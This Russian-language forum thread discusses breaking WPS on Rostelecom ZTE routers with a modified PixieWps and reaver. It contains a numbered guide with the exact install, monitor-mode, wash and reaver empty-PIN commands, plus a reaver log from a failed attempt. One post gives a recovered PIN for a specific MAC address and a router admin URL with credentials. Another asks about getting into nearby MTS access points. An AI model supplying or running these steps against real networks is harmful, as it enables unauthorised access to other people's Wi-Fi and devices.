А то! И на десерт... Создал пулл реквест в репозиторий PixieWps - добавление поддержки пустого пина. https://github.com/wiire-a/pixiewps/pull/49
Тоесть сичас могу подклюца к тем MTSAa что там? А вот :MTS828FT-9FA4 вроде это название.Да? Через пиксю?
Пробовал с этим флагом -p "" взломать свой ростелекомовский роутер ZTE H118n (v2.3) не работает, не могли бы Вы написать гайд как его взламывали? +Я взламывал на Kali Linux, с новым Reaver t6x
Можете привести лог? Есть вероятность, что в reaver закрался баг. С помощью модифицированного Router Scan: https://forum.antichat.ru/posts/4122981 Но он ещё публично не выпустился.
Сегодня попробовал, у меня все получилось) Гайд для владельцев ZTE H118N v2.3 (Ростелеком) (Взлом WPS): 1.Загружаемся в Kali Linux( с флешки) 2.Подключаемся к интернету (через Wi-Fi, или по кабелю) 3.Запускаем терминал 4.Устанавливаем libpcap-dev: А.sudo apt-get update (обновление репозитория Kali Linux) Б.sudo apt-get install libpcap-dev (Установка PCAP) 5.Установка Reaver (t6x) А.git clone https://github.com/t6x/reaver-wps-fork-t6x Б.cd reaver-wps-fork-t6x*/ cd src/ ./configure make В.sudo make install 5.Когда установили, перезапускаем Терминал 6.Переводим Wi-Fi адаптер в режим монитора 7.Вводим: airmon-ng kill (убиваем процессы при соединении по Wi-Fi) 8.Ищем через wash -i wlan0mon (вместо wlan0mon вводите название Вашего адаптера в режиме монитора) точку, которую будете ломать 9.Вводим команду (внимательно вводите, чтобы ошибок не было! P.S Вместо wlan0mon вводите ваш адаптер в режиме монитора, BSSID- MAC-Адрес роутера,которого взламываем) reaver -i wlan0mon -b bssid -vv -p "" -n 10.Все, точка взломана)
Спасибо,Мастер.Вот это мануальчик! Попробовал на ZXHN H108N но увы... Switching wlan1mon to channel 1 [+] Waiting for beacon from 74:A7:8E:C1:****** [+] Associated with 74:A7:8E:C1:****** (ESSID: RT-WiFi_****) [+] Trying pin "-n" [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [+] Received M1 message [+] Sending M2 message [+] Received M3 message [+] Sending M4 message [+] Received M5 message [+] Sending M6 message [!] WARNING: Receive timeout occurred [+] Sending WSC NACK [+] Quitting after 1 crack attempts [-] Failed to recover WPA key [*] String pin was specified, nothing to save. Может что не так делаю? Опыта и знаний явно не хватает.
Информация уже собирается на 3WiFi. Две двойные кавычки после -p поставили? Если да, попробуйте убрать -n в конце.
Какой алгоритм генерации у роутеров на базе Realtek RTL8671, встречаются с масками RT-WiFi_$$ (где $$ номер квартиры); октеты MAC разные, мне встречались 3 разных октета, Router скан один вскрыл, PIN: 05294176, для MAC: d4:bf:7f:52:89:4c. Пример интерфейса этого роутера для исследования: http://admin:[email protected]/ WPS PIN Companion почему-то PIN ассоциирует с Static PIN - UR-825AC
Пробовал вбивать этот PIN с ключом -p, перебор зацикливается на 90.91%, но в лок не уходит. Результат разумеется не выдаёт, может какие другие параметры указать для перебора?